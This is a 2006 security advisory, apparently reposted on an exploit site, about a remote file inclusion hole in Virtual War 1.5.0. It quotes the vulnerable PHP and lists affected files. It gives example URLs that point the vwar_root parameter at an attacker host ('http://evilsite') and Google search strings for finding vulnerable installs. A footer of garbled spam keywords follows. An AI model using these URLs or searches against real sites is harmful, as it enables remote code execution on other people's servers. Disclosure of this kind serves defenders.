about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Virtual War 1.5.0 Remote File Inclusion Vulnerability



2006-04-10 Virtual War 1.5.0 Remote File Inclusion Vulnerability
Rated as : Moderate Risk

Virtual War File inclusion
---------------------------------
Site:http://www.vwar.de/
Demo:http://www.vwar.de/demo/

---------------------------------------
File Żnclusion


// get functions
$vwar_root = "./";

require ($vwar_root . "includes/functions_common.php");
require ($vwar_root . "includes/functions_front.php");


Vwar_root parameter File inclusion

Aut File

war.php,stats.php,news.php,joinus.php,challenge.php,calendar.php,member.php,popup.php

and

all admin folder files

---------------------------------------
example

1)

http://victim.com/path/admin/admin.php?vwar_root=http://evilsite

2)(phpnuke module)

http://victim.com/path/modules/vwar/admin/admin.php?vwar_root=http://evilsite


-----------------------------------------
Credit:Liz0ziM
E-mail:liz0@bsdmail.com
Site:www.biyo.tk www.biyosecurity.be

-----------------------------------------
google:

"Powered by: Virtual War v1.5.0"

inurl:"modules.php?name=vwar"

-------------------------------------

Source:
http://www.blogcu.com/Liz0ziM/431925/
http://liz0zim.no-ip.org/vwar.txt
securitydot.net - 2006-04-10

Advertising

Copyright 2007, SecurityDot
Sat, 12 Dec 2009 04:24:31 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Naruto hen creampie Sex mambo Remo ass to ass 200 /compo wi-fi 200 /compo Joomla/Mam mambo Remo 200 /compo Wild sex addguest.h 200 /compo ShellBOT I agree wi portable Bollewood. wrt 200 /compo news for c Www.sexyma mambo Remo Www.waters 200 /compo 200 /compo www.mhhbkj CMS is Fre 2.4.21 item.pifa1 vBulletin Microsoft Www.waters xavier sca 200 /compo t144t rpc-11 w.w.w.w.89 200/compon Ruvia 200 /compo sh1988.com 200 /compo Xes Gambar nar 200 /compo 200 /compo hotphotos telnet CMS is Fre